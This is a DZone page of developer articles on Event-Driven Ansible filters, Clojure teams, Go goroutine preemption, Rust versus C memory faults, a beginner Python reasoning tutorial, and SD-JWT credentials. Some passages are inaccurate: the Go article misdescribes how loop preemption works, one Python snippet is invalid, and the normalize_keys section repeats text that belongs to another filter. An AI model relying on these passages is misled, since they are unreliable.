Coding Resources

DZone's Featured Coding Resources

Streamlining Event Data in Event-Driven Ansible

By Binoj Melath Nalinakshan Nair

CORE

In Event-Driven Ansible (EDA), event filters play a crucial role in preparing incoming data for automation rules. They help streamline and simplify event payloads, making it easier to define conditions and actions in rulebooks. Previously, we explored the ansible.eda.dashes_to_underscores filter, which replaces dashes in keys with underscores to ensure compatibility with Ansible's variable naming conventions. In this article, we will explore two more event filters ansible.eda.json_filter and ansible.eda.normalize_keys. The two filters, ansible.eda.json_filter and ansible.eda.normalize_keys give more control over incoming event data. With ansible.eda.json_filter, we can pick and choose which keys to keep or drop from the payload, so we only work with the information we need. This helps the automation run faster and cuts down on mistakes caused by extra, unneeded data. The ansible.eda.normalize_keys filter addresses the challenge of inconsistent key formats by converting keys containing non-alphanumeric characters into a standardized format using underscores. This normalization ensures that all keys conform to Ansible's variable naming requirements, facilitating seamless access to event data within rulebooks and playbooks. Using these filters, we can create more robust and maintainable automation workflows in Ansible EDA. Testing the json_filter Filter With a Webhook To demonstrate how the ansible.eda.json_filter works, we’ll send a sample JSON payload to a webhook running on port 9000 using a simple curl command. This payload includes both host metadata and system alert metrics. The metadata section provides details like the operating system type (linux) and kernel version (5.4.17-2136.341.3.1.el8uek.aarch64). The metrics section reports key system indicators, such as CPU usage (92%), memory usage (85%), disk I/O (120), and load average (3.2). Here's the command used to post the data: Shell curl --header "Content-Type: application/json" --request POST \ --data '{ "alert_data": { "metadata": { "os_type": "linux", "kernel_version": "5.4.17-2136.341.3.1.el8uek.aarch64" } }, "alert_details": { "metrics": { "cpu_usage": 92, "memory_usage": 85, "disk_io": 120, "load_average": 3.2 } } }' http://localhost:9000/ webhook.yml Here’s a demo script that shows how to use ansible.eda.json_filter to remove unwanted fields from a JSON event. In this setup, a webhook listens on port 9000 and receives alert data. The filter is set to exclude keys such as os_type, disk_io, and load_average, which are not required for further processing. This helps focus only on the important metrics like CPU and memory usage. The filtered event is then printed to the console, making it easy to understand how the filter works. YAML - name: Event Filter json_filter demo hosts: localhost sources: - ansible.eda.webhook: port: 9000 host: 0.0.0.0 filters: - ansible.eda.json_filter: exclude_keys: ['os_type', 'disk_io', 'load_average'] rules: - name: Print the event details condition: true action: print_event: pretty: true Screenshots Testing the normalize_keys Filter With a Webhook To demonstrate the functionality of the ansible.eda.normalize_keys filter, we are sending a JSON payload containing keys with various special characters to a locally running webhook endpoint. This test demonstrates how the filter transforms keys with non-alphanumeric characters into a standardized format using underscores, ensuring compatibility with Ansible's variable naming conventions. Shell curl -X POST http://localhost:9000/ \ -H "Content-Type: application/json" \ -d '{ "event-type": "alert", "details": { "alert-id": "1234", "alert.message": "CPU usage high" }, "server-name": "web-01", "cpu.usage%": 85, "disk space": "70%", "server.com/&abc": "value1", "user@domain.com": "value2" }' In this payload, keys such as event-type, alert-id, alert.message, server-name, cpu.usage%, disk space, server.com/&abc, and user@domain.com include characters like hyphens, periods, spaces, slashes, ampersands, and at symbols. When processed through the ansible.eda.normalize_keys filter, these keys are transformed by replacing sequences of non-alphanumeric characters with single underscores. For example, server.com/&abc becomes server_com_abc, and user@domain.com becomes user_domain_com. This normalization process simplifies the handling of event data, reduces the likelihood of errors due to invalid variable names, and enhances the robustness and maintainability of your automation workflows in Ansible EDA. webhook.yml Here’s a demo script that shows how to use ansible.eda.normalize_keys to remove unwanted fields from a JSON event. In this setup, a webhook listens on port 9000 and receives alert data. The filter is set to exclude keys such as os_type, disk_io, and load_average, which are not required for further processing. This helps focus only on the important metrics like CPU and memory usage. The filtered event is then printed to the console, making it easy to understand how the filter works. YAML - name: Event Filter normalize_keys demo hosts: localhost sources: - ansible.eda.webhook: port: 9000 host: 0.0.0.0 filters: - ansible.eda.normalize_keys: rules: - name: Webhook rule to print the event data condition: true action: print_event: pretty: true Screenshots Conclusion In the above demos, we saw how two simple but powerful filters ansible.eda.json_filter and ansible.eda.normalize_keys can transform incoming event data into exactly what the automation needs. Using the exclude_keys option, we removed unnecessary details. With include_keys, we can ensure that important information is retained. This approach makes automation more focused, easier to manage, and faster to run. It also helps prevent issues that can occur when events contain too much extra data. Similarly, the ansible.eda.normalize_keys filter is an invaluable addition to any Event-Driven Ansible workflow. Converting keys with special characters into clean, underscore‑only names removes a common source of errors and confusion when accessing event data. This simple normalization step not only makes rulebooks and playbooks more readable, but also ensures that your automation logic remains robust and maintainable across diverse data sources. This will help to streamline the variable handling and help the developers to focus on building effective, reliable automation rather than dealing with inconsistent payload formats. Together, these filters let you focus on the real work — building reliable, efficient EDA workflows — without getting bogged down in messy data. Note: The views expressed in this article are my own and do not necessarily reflect the views of my employer. More

How Clojure Shapes Teams and Products

By Artem Barmin

Four episodes into our journey exploring real-world Clojure stories, fascinating patterns have emerged from our conversations with leaders at Quuppa, CodeScene, Catermonkey, and Griffin. While each company's domain is distinct — from indoor positioning technology to banking infrastructure – their experiences reveal compelling insights about how Clojure influences not just code but entire organizations. Building Teams and Projects The journey to adopting Clojure often begins with practical challenges. At Quuppa, they needed better ways to handle data serialization in their enterprise system. Catermonkey's Marten Sytema had already built a working product in Java but saw the potential for faster iteration with Clojure. Griffin recognized how Clojure's immutable-by-default nature perfectly matched banking's inherent requirements. Each team's path was different, but they all faced similar questions about building and growing Clojure teams. The Hiring Reality The smaller Clojure talent pool, often seen as a limitation, has proven to be an unexpected advantage. As James Trunk from Griffin puts it, "The advantage of fishing in a smaller pond with bigger fish is it's easier to catch the bigger fish." — James Trunk, Griffin Rather than requiring Clojure experience, successful teams look for developers with functional programming backgrounds or, more importantly, the right mindset. Experience with Haskell, Erlang, OCaml, or even Scala often indicates developers who will understand Clojure's approach. Location doesn't have to be a constraint, either. When Catermonkey, based in a rural part of the Netherlands, needed to grow its team, it found that remote work eliminated geographical limitations. More importantly, it discovered that Clojure works as a natural filter, attracting developers who deeply understand and are excited about functional programming principles. The Learning Curve Myth Despite concerns about Clojure's learning curve, teams consistently report success in onboarding new developers. Clojure's learning curve reputation seems based more on misconceptions than reality. First, any competent developer can learn Clojure quickly because the core concepts are simple — it's mostly functions and data. The challenge isn't technical complexity but adjusting to a different way of thinking. As Griffin found, developers with functional programming backgrounds adapt particularly well, having already made this mental shift. Second, being unfamiliar with traditional enterprise patterns can actually be an advantage. When Quuppa brought in fresh graduates, they picked up Clojure naturally — they had no preconceptions about how systems "should" be built. They didn't have to unlearn complex inheritance hierarchies or intricate design patterns. This matches what Marten observed at Catermonkey — developers who embrace Clojure's approach become productive quickly. The learning curve isn't so much steep as it is different. Instead of memorizing frameworks and patterns, developers learn to compose simple tools effectively. The tooling complaints often cited as a barrier seem outdated. Modern editors like VS Code with Calva provide smooth onboarding experiences. The REPL quickly becomes a natural part of the development workflow once developers experience its benefits. What these teams found isn't that Clojure is easy to learn, but that learning it is worthwhile. The investment pays off in increased productivity and capability. How Clojure Shapes Development Clojure's influence on development goes beyond technical advantages — it fundamentally changes what teams can achieve and how they work together. The Productivity Multiplier These teams aren't choosing to stay small — Clojure enables them to handle complex challenges without needing large teams. Griffin built a banking-as-a-service platform with 40 engineers where similar projects typically require hundreds. This increased productivity shapes everything from how decisions are made to how problems are solved. Their technical decision-making process is a direct result of this dynamic. Because the team is naturally more focused, Griffin can afford thoughtful processes like anonymous voting on technical decisions. When your team is small enough that everyone understands the whole system, you can have genuine technical discourse rather than hierarchical decision-making. Simple Tools, Complex Problems The productivity advantage comes largely from Clojure's emphasis on simplicity. This isn't about avoiding complexity — it's about having the right tools to tackle it efficiently. "If you can do it with a function that's like 10 lines, if you can do that, we try to do that instead of pulling a library for it." — Marten Sytema, Catermonkey Griffin's experience shows how this translates to serious enterprise systems. Building a banking platform requires handling complex requirements around transactions, compliance, and scale. Yet they found Clojure "just gets out of your way and shows you, okay, here's data, here are the functions that work on that data, here's a pipeline." The language's focus on data transformation and simple, composable functions lets them build sophisticated systems without the accidental complexity that typically drives the need for larger teams. This combination of simplicity and power means teams can focus on actual business problems rather than managing complexity. They don't need layers of abstraction, elaborate frameworks, or large teams coordinating different system parts — they can build robust solutions with small, focused teams using simple tools effectively. Long-Term Impact The most compelling insights come from observing how these choices play out over time. CodeScene grew from a solo project to a team of 15 while maintaining the ability to innovate. Griffin scaled from 7 to over 40 engineers while building a robust banking platform. Catermonkey expanded from serving 15 customers to over 200 across multiple countries. It's clear that choosing a programming language is never just a technical decision. It's a choice that shapes how teams work together, grow, and approach problems. In that light, these early conversations suggest that Clojure's real value might lie not just in its technical merits but in how it influences the entire practice of building and maintaining software systems. More

Beyond Linguistics: Real-Time Domain Event Mapping with WebSocket and Spring Boot

By Soham Sengupta

Simplify Authorization in Ruby on Rails With the Power of Pundit Gem

By Denys Kozlovskyi

Event-Driven Architectures: Designing Scalable and Resilient Cloud Solutions

By Srinivas Chippagiri

CORE

How the Go Runtime Preempts Goroutines for Efficient Concurrency

Go's lightweight concurrency model, built on goroutines and channels, has made it a favorite for building efficient, scalable applications. Behind the scenes, the Go runtime employs sophisticated mechanisms to ensure thousands (or even millions) of goroutines run fairly and efficiently. One such mechanism is goroutine preemption, which is crucial for ensuring fairness and responsiveness. In this article, we'll dive into how the Go runtime implements goroutine preemption, how it works, and why it's critical for compute-heavy applications. We'll also use clear code examples to demonstrate these concepts. What Are Goroutines and Why Do We Need Preemption? A goroutine is Go's abstraction of a lightweight thread. Unlike heavy OS threads, a goroutine is incredibly memory-efficient — it starts with a small stack (typically 2 KB), which grows dynamically. The Go runtime schedules goroutines on a pool of OS threads, following an M scheduling model, where M OS threads map onto N goroutines. While Go's cooperative scheduling usually suffices, there are scenarios where long-running or tight-loop goroutines can hog the CPU, starving other goroutines. Example: Go package main func hogCPU() { for { // Simulating a CPU-intensive computation // This loop never yields voluntarily } } func main() { // Start a goroutine that hogs the CPU go hogCPU() // Start another goroutine that prints periodically go func() { for { println("Running...") } }() // Prevent main from exiting select {} } In the above code, hogCPU() runs indefinitely without yielding control, potentially starving the goroutine that prints messages (println). In earlier versions of Go (pre-1.14), such a pattern could lead to poor responsiveness, as the scheduler wouldn’t get a chance to interrupt the CPU-hogging goroutine. How Goroutine Preemption Works in the Go Runtime 1. Cooperative Scheduling Go's scheduler relies on cooperative scheduling, where goroutines voluntarily yield control at certain execution points: Blocking operations, such as waiting on a channel: Go func blockingExample(ch chan int) { val := <-ch // Blocks here until data is sent on the channel println("Received:", val) } Function calls, which naturally serve as preemption points: Go func foo() { bar() // Control can yield here since it's a function call } While cooperative scheduling works for most cases, it fails for compute-heavy or tight-loop code that doesn't include any blocking operations or function calls. 2. Forced Preemption for Tight Loops Starting with Go 1.14, forced preemption was introduced to handle scenarios where goroutines don’t voluntarily yield — for example, in tight loops. Let’s revisit the hogCPU() loop: Go func hogCPU() { for { // Simulating tight loop } } In Go 1.14+, the compiler automatically inserts preemption checks within such loops. These checks periodically verify whether the goroutine's execution should be interrupted. For example, the runtime monitors whether the preempt flag for the goroutine is set, and if so, the goroutine pauses execution, allowing the scheduler to run other goroutines. 3. Code Example: Preemption in Action Here's a practical example of forced preemption in Go: Go package main import ( "time" ) func tightLoop() { for i := 0; i < 1e10; i++ { if i%1e9 == 0 { println("Tight loop iteration:", i) } } } func printMessages() { for { println("Message from goroutine") time.Sleep(100 * time.Millisecond) } } func main() { go tightLoop() go printMessages() // Prevent main from exiting select {} } What Happens? Without preemption, the tightLoop() goroutine could run indefinitely, starving printMessages().With forced preemption (Go 1.14+), the runtime interrupts tightLoop() periodically via inserted preemption checks, allowing printMessages() to execute concurrently. 4. How the Runtime Manages Preemption Preemption Flags Each goroutine has metadata managed by the runtime, including a g.preempt flag. If the runtime detects that a goroutine has exceeded its time quota (e.g., it's executing a CPU-heavy computation), it sets the preempt flag for that goroutine. Preemption checks inserted by the compiler read this flag and pause the goroutine at predetermined safepoints. Safepoints Preemption only occurs at strategic safepoints, such as during function calls or other preemption-friendly execution locations. This allows the runtime to preserve memory consistency and avoid interrupting sensitive operations. Preemption Example: Tight Loop Without Function Calls Let’s look at a micro-optimized tight loop without function calls: Go func tightLoopWithoutCalls() { for i := 0; i < 1e10; i++ { // Simulating CPU-heavy operations } } For this code: The Go compiler inserts preemption checks during the compilation phase.These checks ensure fairness by periodically pausing execution and allowing other goroutines to run. To see preemption in effect, you could monitor your application’s thread activity using profiling tools like pprof or visualize execution using Go's trace tool (go tool trace). Garbage Collection and Preemption Preemption also plays a key role in garbage collection (GC). For example, during a "stop-the-world" GC phase: The runtime sets the preempt flag for all goroutines.Goroutines pause execution at safepoints.The GC safely scans memory, reclaims unused objects, and resumes all goroutines once it's done. This seamless integration ensures memory safety while maintaining concurrency performance. Conclusion Goroutine preemption is one of the innovations that make Go a compelling choice for building concurrent applications. While cooperative scheduling works for most workloads, forced preemption ensures fairness in compute-intensive scenarios. Whether you're writing tight loops, managing long-running computations, or balancing thousands of lightweight goroutines, you can rely on Go's runtime to handle scheduling and preemption seamlessly. Preemption paired with Go's garbage collection mechanisms results in a robust runtime environment, ideal for responsive and scalable software.

By Dinoja Padmanabhan

Segmentation Violation and How Rust Helps Overcome It

Segmentation faults are a common issue when working in low-level programming languages like C. These faults occur when a program attempts to access memory it’s not supposed to, leading to crashes and unpredictable behavior. While C offers granular control over memory management, it leaves developers responsible for ensuring safety, often resulting in bugs such as buffer overflows, use-after-free errors, and dangling pointers. Enter Rust, a systems programming language designed to address these issues with its built-in safety mechanisms. Rust prevents segmentation faults and other memory-related errors through its ownership system, borrow checker, and strict type and lifetime guarantees — all features enforced at compile time. This article will compare C's approach to segmentation faults with Rust's implementation and explain why Rust significantly reduces memory-related bugs. What Causes Segmentation Faults in C? Segmentation faults in C occur when a program interacts improperly with memory. Common causes include: 1. Null Pointer Dereferencing Attempting to access memory through a null or uninitialized pointer. C int *ptr = NULL; // Pointer is NULL *ptr = 42; // Dereferencing NULL -> segmentation fault Issue: We are trying to dereference NULL pointers, and there is no protection in C against accessing memory via an invalid pointer. 2. Buffer Overflows Reading or writing beyond the bounds of an allocated buffer. C char buffer[10]; buffer[10] = 'A'; // Access beyond the bounds of the allocated buffer 3. Dangling Pointers Accessing memory after it has been freed. C int *ptr = malloc(sizeof(int)); free(ptr); *ptr = 10; // Segmentation fault: Pointer points to freed memory. 4. Double Free Mismanaging heap memory by freeing the same pointer twice. C int *ptr = malloc(sizeof(int)); free(ptr); /* do something else */ free(ptr); // Undefined behavior: Double free. While extremely powerful, C's manual memory management opens the door to a wide range of memory-related bugs that cause segmentation faults. How Rust Prevents Segmentation Faults Rust was designed to be a safe systems programming language, offering low-level control similar to C but with safeguards that prevent memory-related errors. Here's how Rust compares: 1. Ownership System Rust’s ownership model ensures that each piece of memory is owned by a single variable. Once ownership moves (via assignment or function passing), the original variable becomes inaccessible, preventing dangling pointers and use-after-free errors. Example (Safe management of ownership): Rust fn main() { let x = String::from("Hello, Rust"); let y = x; // Ownership moves from `x` to `y` println!("{}", x); // Error: `x` is no longer valid after transfer } How it prevents errors: Ensures memory is cleaned up automatically when the owner goes out of scope.Eliminates dangling pointers by prohibiting the use of invalidated references. 2. Null-Free Constructs With Option Rust avoids null pointers by using the Option enum. Instead of representing null with a raw pointer, Rust forces developers to handle the possibility of absence explicitly. Example (Safe null handling): Rust fn main() { let ptr: Option<&i32> = None; // Represents a "safe null" match ptr { Some(val) => println!("{}", val), None => println!("Pointer is null"), } } How it prevents errors: No implicit "null" values — accessing an invalid memory location is impossible.Eliminates crashes caused by dereferencing null pointers. 3. Bounds-Checked Arrays Rust checks every array access at runtime, preventing buffer overflows. Any out-of-bounds access results in a panic (controlled runtime error) instead of corrupting memory or causing segmentation faults. Rust fn main() { let nums = [1, 2, 3, 4]; println!("{}", nums[4]); // Error: Index out of bounds } How it prevents errors: Protects memory by ensuring all accesses are within valid bounds.Eliminates potential exploitation like buffer overflow vulnerabilities. 4. Borrow Checker Rust’s borrowing rules enforce safe memory usage by preventing mutable and immutable references from overlapping. The borrow checker ensures references to memory never outlive their validity, eliminating many of the concurrency-related errors encountered in C. Example: Rust fn main() { let mut x = 5; let y = &x; // Immutable reference let z = &mut x; // Error: Cannot borrow `x` mutably while it's borrowed immutably. } How it prevents errors: Disallows aliasing mutable and immutable references.Prevents data races and inconsistent memory accesses. 5. Automatic Memory Management via Drop Rust automatically cleans up memory when variables go out of scope, eliminating the need for explicit malloc or free calls. This avoids double frees or dangling pointers, common pitfalls in C. Rust struct MyStruct { value: i32, } fn main() { let instance = MyStruct { value: 10 }; // Memory is freed automatically at the end of scope. } How it prevents errors: Ensures every allocation is freed exactly once, without developer intervention.Prevents use-after-free errors with compile-time checks. 6. Runtime Safety With Panics Unlike C, where errors often lead to undefined behavior, Rust prefers deterministic "panics." A panic halts execution and reports the error in a controlled way, preventing access to invalid memory. Why Choose Rust Over C for Critical Applications Rust fundamentally replaces C’s error-prone memory management with compile-time checks and safe programming constructs. Developers gain the low-level power of C while avoiding costly runtime bugs like segmentation faults. For systems programming, cybersecurity, and embedded development, Rust is increasingly favored for its reliability and performance. Rust demonstrates that safety and performance can coexist, making it a great choice for projects where stability and correctness are paramount. Conclusion While C is powerful, it leaves developers responsible for avoiding segmentation violations, leading to unpredictable bugs. Rust, by contrast, prevents these issues through ownership rules, the borrow checker, and its strict guarantee of memory safety at compile time. For developers seeking safe and efficient systems programming, Rust is a better option.

By Dinoja Padmanabhan

Beyond ChatGPT, AI Reasoning 2.0: Engineering AI Models With Human-Like Reasoning

What You'll Learn This tutorial will teach you how to build AI models that can understand and solve problems systematically. You'll learn to create a reasoning system that can: Process user inputs intelligentlyMake decisions based on rules and past experiencesHandle real-world scenariosLearn and improve from feedback Introduction Have you ever wondered how to create AI models that can think and reason like humans? In this hands-on tutorial, we'll build a reasoning AI system from scratch, using practical examples and step-by-step guidance. Prerequisites: Basic Python programming knowledgeUnderstanding of if-else statements and functionsFamiliarity with pip package installationNo prior AI/ML experience required! Getting Started Setting Up Your Environment Configure a virtual environment: PowerShell python -m venv reasoning-ai source reasoning-ai/bin/activate # Linux/Mac .\reasoning-ai\Scripts\activate # Windows Install required packages: PowerShell pip install torch transformers networkx numpy Understanding the Basics First, we need to understand the fundamental components of AI reasoning. This section breaks down the core concepts that make AI systems "think" logically: Input processing – how AI systems understand and categorize informationPattern recognition – methods for identifying recurring patternsProblem-solving strategies – approaches to finding solutionsLearning mechanisms – how systems improve from experience Before diving into complex models, let's understand what makes an AI system "reason." Think of it like teaching a child to solve puzzles: Look at the pieces (input processing)Understand patterns (pattern recognition)Try different approaches (problem solving)Learn from mistakes (feedback loop) Building Your First Reasoning Model In this section, we'll create a basic AI reasoning system step by step. We'll start with simple rules and gradually add more sophisticated features. We are starting simple because it is: Easier to understand core conceptsFaster to implement and testA clear path to adding complexityBetter debugging and maintenance Step one is to create a simple rules-based system. Using the code below, this system demonstrates the basics of decision making in AI and uses if-then rules to make logical choices based on input conditions: Python class SimpleReasoner: def __init__(self): self.rules = {} def add_rule(self, if_condition, then_action): self.rules[if_condition] = then_action def reason(self, situation): for condition, action in self.rules.items(): if condition in situation: return action return "I need more information" # Example usage reasoner = SimpleReasoner() reasoner.add_rule("raining", "take umbrella") reasoner.add_rule("sunny", "wear sunscreen") print(reasoner.reason("it is raining today")) # Output: take umbrella Step two is to add memory: Python class SmartReasoner: def __init__(self): self.rules = {} self.memory = [] def remember(self, situation, outcome): self.memory.append((situation, outcome)) def reason(self, situation): # Check past experiences for past_situation, outcome in self.memory: if situation similar_to past_situation: return f"Based on past experience: {outcome}" Real-World Example: Building a Customer Support Bot Now we'll apply our learning to create something practical: an AI-powered customer support system. This example shows how to: Handle real user queriesMap problems to solutionsProvide relevant responsesScale the system for multiple use cases Let's create a practical example that helps solve real customer problems: Python class SupportBot: def __init__(self): self.knowledge_base = { 'login_issues': { 'symptoms': ['cant login', 'password reset', 'forgot password'], 'solution': 'Try resetting your password through the forgot password link' }, 'payment_issues': { 'symptoms': ['payment failed', 'card declined', 'billing error'], 'solution': 'Check if your card details are correct and has sufficient funds' } } def understand_problem(self, user_message): user_words = user_message.lower().split() for issue, data in self.knowledge_base.items(): if any(symptom in user_message.lower() for symptom in data['symptoms']): return data['solution'] return "Let me connect you with a human agent for better assistance" # Usage bot = SupportBot() print(bot.understand_problem("I cant login to my account")) Making Your Model Smarter This section explores advanced features that make your AI system more intelligent and user friendly. We'll focus on: Understanding contextHandling complex situationsImproving response accuracyManaging user expectations Adding Context Understanding Context is crucial for accurate responses. The example code below shows how to analyze user messages for urgency levels, user emotions, conversation history, and previous interactions: Python class SmartSupportBot(SupportBot): def __init__(self): super().__init__() self.conversation_history = [] def analyze_context(self, message): context = { 'urgency': self._check_urgency(message), 'sentiment': self._analyze_sentiment(message), 'complexity': self._assess_complexity(message) } return context def _check_urgency(self, message): urgent_words = {'urgent', 'asap', 'emergency', 'critical', 'immediately'} message_words = set(message.lower().split()) urgency_score = len(urgent_words.intersection(message_words)) return 'high' if urgency_score > 0 else 'normal' def _analyze_sentiment(self, message): negative_indicators = { 'frustrated': ['!', '??', 'not working', 'broken'], 'angry': ['terrible', 'worst', 'awful', 'useless'] } message = message.lower() sentiment = 'neutral' for emotion, indicators in negative_indicators.items(): if any(ind in message for ind in indicators): sentiment = emotion break return sentiment def _assess_complexity(self, message): # Count distinct technical terms technical_terms = {'api', 'error', 'console', 'database', 'server'} message_terms = set(message.lower().split()) complexity_score = len(technical_terms.intersection(message_terms)) return 'complex' if complexity_score > 1 else 'simple' def get_smart_response(self, user_message): context = self.analyze_context(user_message) base_response = self.understand_problem(user_message) # Adjust response based on context if context['urgency'] == 'high': return f"PRIORITY - {base_response}" if context['sentiment'] == 'frustrated': return f"I understand this is frustrating. {base_response}" if context['complexity'] == 'complex': return f"{base_response}\n\nFor technical details, please check our documentation at docs.example.com" return base_response # Usage Example smart_bot = SmartSupportBot() message = "This is urgent! My API keeps throwing errors!!" response = smart_bot.get_smart_response(message) print(response) # Output will include urgency and technical complexity markers Adding Learning Capabilities Using the following code, let's implement a system that learns from past interactions: Python class LearningBot(SmartSupportBot): def __init__(self): super().__init__() self.solution_feedback = {} def record_feedback(self, problem, solution, was_helpful): if problem not in self.solution_feedback: self.solution_feedback[problem] = {'successes': 0, 'failures': 0} if was_helpful: self.solution_feedback[problem]['successes'] += 1 else: self.solution_feedback[problem]['failures'] += 1 def get_solution_confidence(self, problem): if problem not in self.solution_feedback: return 0.5 # Default confidence stats = self.solution_feedback[problem] total = stats['successes'] + stats['failures'] if total == 0: return 0.5 return stats['successes'] / total def get_adaptive_response(self, user_message): base_solution = self.get_smart_response(user_message) confidence = self.get_solution_confidence(user_message) if confidence < 0.3: return f"{base_solution}\n\nNote: You might also want to contact support for additional assistance." elif confidence > 0.8: return f"Based on successful past resolutions: {base_solution}" return base_solution # Usage Example learning_bot = LearningBot() learning_bot.record_feedback("api error", "Check API credentials", True) learning_bot.record_feedback("api error", "Check API credentials", True) learning_bot.record_feedback("api error", "Check API credentials", False) response = learning_bot.get_adaptive_response("Having API errors") print(response) # Output will include confidence-based adjustments Addressing Common Challenges and Solutions Every developer faces challenges when building AI systems. This section notes common issues you may encounter in your system and their respective solutions. Challenge: Model Always Returns Default Response Add debugging prints: Python print(f"Input received: {user_input}") print(f"Matched patterns: {matched_patterns}") Challenge: Model Gives Irrelevant Responses Add confidence scoring: Python def get_confidence_score(self, response, situation): relevance = check_relevance(response, situation) return relevance Challenge: Memory Usage Is Too High Implement simple caching: Python from functools import lru_cache @lru_cache(maxsize=100) def process_input(user_input): return analyze_input(user_input) Challenge: Handling Unknown Situations Implement fallback strategies: Python def handle_unknown(self, situation): similar_cases = find_similar_cases(situation) if similar_cases: return adapt_solution(similar_cases[0]) return get_human_help() Testing Your Model Testing is essential for building reliable AI systems. This section covers: Creating test casesMeasuring performanceIdentifying weaknessesImproving accuracy The following code demonstrates a basic testing framework: Python def test_reasoner(): test_cases = [ ("I forgot my password", "password reset instructions"), ("Payment not working", "payment troubleshooting steps"), ("App crashes on startup", "technical support contact") ] success = 0 for input_text, expected in test_cases: result = bot.understand_problem(input_text) if expected in result.lower(): success += 1 print(f"Success rate: {success/len(test_cases)*100}%") Overview of Evaluation and Testing A comprehensive testing framework implements diverse evaluation metrics: Logical consistencySolution completenessReasoning transparencyPerformance under uncertainty For real-world validation, test your model against: Industry-specific case studiesComplex real-world scenariosEdge cases and failure modes Best Practices and Common Pitfalls Best practices to implement include: Maintaining explainability in your model's reasoning processImplementing robust error handling and uncertainty quantificationDesigning for scalability and maintainabilityDocumenting reasoning patterns and decision paths Common pitfalls to avoid include: Over-relying on black-box approachesNeglecting edge cases in training dataInsufficient validation of reasoning pathsPoor handling of uncertainty Conclusion and Next Steps Building AI models for advanced reasoning requires a careful balance of theoretical understanding and practical implementation. Focus on creating robust, explainable systems that can handle real-world complexity while also maintaining reliability and performance. Now that you've built a basic reasoning system, you can: Add more complex rules and patternsImplement machine learning for better pattern recognitionConnect to external APIs for enhanced capabilitiesAdd natural language processing features Resources to learn more: "Python for Beginners" (python.org)"Introduction to AI" (coursera.org)"Machine Learning Basics" (kaggle.com)Getting Started With Agentic AI, DZone Refcard Any questions? Feel free to leave comments below, and thank you!

By Mahesh Vaijainthymala Krishnamoorthy

Issue and Present Verifiable Credentials With Spring Boot and Android

As digital identity ecosystems evolve, the ability to issue and verify digital credentials in a secure, privacy-preserving, and interoperable manner has become increasingly important. Verifiable Credentials (VCs) offer a W3C-standardized way to present claims about a subject, such as identity attributes or qualifications, in a tamper-evident and cryptographically verifiable format. Among the emerging formats, Selective Disclosure JSON Web Tokens (SD-JWTs) stand out for enabling holders to share only selected parts of a credential, while ensuring its authenticity can still be verified. In this article, we demonstrate the issuance and presentation of Verifiable Credentials using the SD-JWT format, leveraging Spring Boot microservices on the backend and a Kotlin-based Android application acting as the wallet on the client side. We integrate support for the recent OpenID for Verifiable Credential Issuance (OIDC4VCI) and OpenID for Verifiable Presentations (OIDC4VP) protocols, which extend the OpenID Connect (OIDC) framework to enable secure and user-consented credential issuance and verification flows. OIDC4VCI defines how a wallet can request and receive credentials from an issuer, while OIDC4VP governs how those credentials are selectively presented to verifiers in a trusted and standardized way. By combining these technologies, this demonstration offers a practical, end-to-end exploration of how modern identity wallet architectures can be assembled using open standards and modular, developer-friendly tools. While oversimplified for demonstration purposes, the architecture mirrors key principles found in real-world initiatives like the European Digital Identity Wallet (EUDIW), making it a useful foundation for further experimentation and learning. Issue Verifiable Credential Let's start with a sequence diagram describing the flow and the participants involved: The WalletApp is the Android app. Implemented in Kotlin with Authlete's Library for SD-JWT included. The Authorization Server is a Spring Authorization Server configured for Authorization Code flow with Proof Key for Code Exchange (PKCE). It is used to authenticate users who request via the mobile app to obtain their Verifiable Credential, requires their Authorization Consent and issues Access Tokens with a predefined scope named "VerifiablePortableDocumentA1" for our demo. The Issuer is a Spring Boot microservice acting as an OAuth 2.0 Resource Server, delegating its authority management to the Authorization Server introduced above. It offers endpoints to authorized wallet instances for Credential Issuance, performs Credential Request validations, and generates and serves Verifiable Credentials in SD-JWT format to the requestor. It also utilizes Authlete's Library for SD-JWT, this time on the server side. The Authentic Source, in this demo, is part of the Issuer codebase (in reality, can be a totally separate but, of course, trusted entity) and has an in-memory "repository" of user attributes. These attributes are meant to be retrieved by the Issuer and be enclosed in the produced SD-JWT as "Disclosures." Credential Request Proof and Benefits of SD-JWT When a wallet app requests a Verifiable Credential, it proves possession of a cryptographic key using a mechanism called JWT proof. This proof is a signed JSON Web Token that the wallet creates and sends along with the credential request. The issuer verifies this proof and includes a reference to the wallet’s key (as a cnf claim) inside the SD-JWT credential. This process binds the credential to the wallet that requested it, ensuring that only that wallet can later prove possession. The issued credential uses the Selective Disclosure JWT (SD-JWT) format, which gives users fine-grained control over what information they share. Unlike traditional JWTs that expose all included claims, SD-JWTs let the holder (the wallet user) disclose only the specific claims needed, such as name or age, while keeping the rest private. This enables privacy-preserving data sharing without compromising verifiability. So even when only a subset of claims is disclosed, the original issuer’s signature remains valid! The Verifier can still confirm the credential’s authenticity, ensuring trust in the data while respecting the holder’s choice to share minimally. Now that the wallet holds a Verifiable Credential, the next step is to explore its practical use: selective data sharing with a Relying Party (Verifier). This is done through a Verifiable Presentation, which allows the user to consent to sharing only specific claims from their credential, just enough to, for example, access a protected resource, complete a KYC process, or prove eligibility for a service, without revealing unnecessary personal information. Present Verifiable Credential The following sequence diagram outlines a data-sharing scenario where a user is asked to share specific personal information to complete a task or procedure. This typically occurs when the user visits a website or application (the Verifier) that requires certain details, and the user's digital wallet facilitates the sharing process with their consent. The Verifier is a Spring Boot microservice with the following responsibilities: Generates a Presentation Definition associated with a specific requestIdServes pre-stored Presentation Definitions by requestIdAccepts and validates incoming vp_token posted by the wallet client. Again, here, Authlete's Library for SD-JWT is the primary tool At the core of this interaction is the Presentation Definition — a JSON-based structure defined by the Verifier that outlines the type of credential data it expects (e.g., name, date of birth, nationality). This definition acts as a contract and is retrieved by the wallet during the flow. The wallet interprets it dynamically to determine which of the user's stored credentials — and which specific claims within them—can fulfill the request. Once a suitable credential is identified (such as the previously issued SD-JWT), the wallet prompts the user to consent to share only the required information. This is where Selective Disclosure comes into play. The wallet then prepares a Verifiable Presentation token (vp_token), which encapsulates the selectively disclosed parts of the credential along with a binding JWT. This binding JWT, signed using the wallet’s private key, serves two critical functions: It proves possession of the credential and Cryptographically links the presentation to this specific session or verifier (e.g., through audience and nonce claims). It also includes a hash derived from the presented data, ensuring its integrity. On the Verifier side, the backend microservice performs a series of validations: It retrieves the Issuer’s public key to verify the original SD-JWT’s signature.It verifies the binding JWT, confirming both its signature and that the hash of the disclosed data matches the value expected — thereby ensuring the credential hasn’t been tampered with and that it’s bound to this particular transaction.It checks additional metadata, such as audience, nonce, and expiration, to ensure the presentation is timely and intended for this verifier. While this demo focuses on the core interactions, a 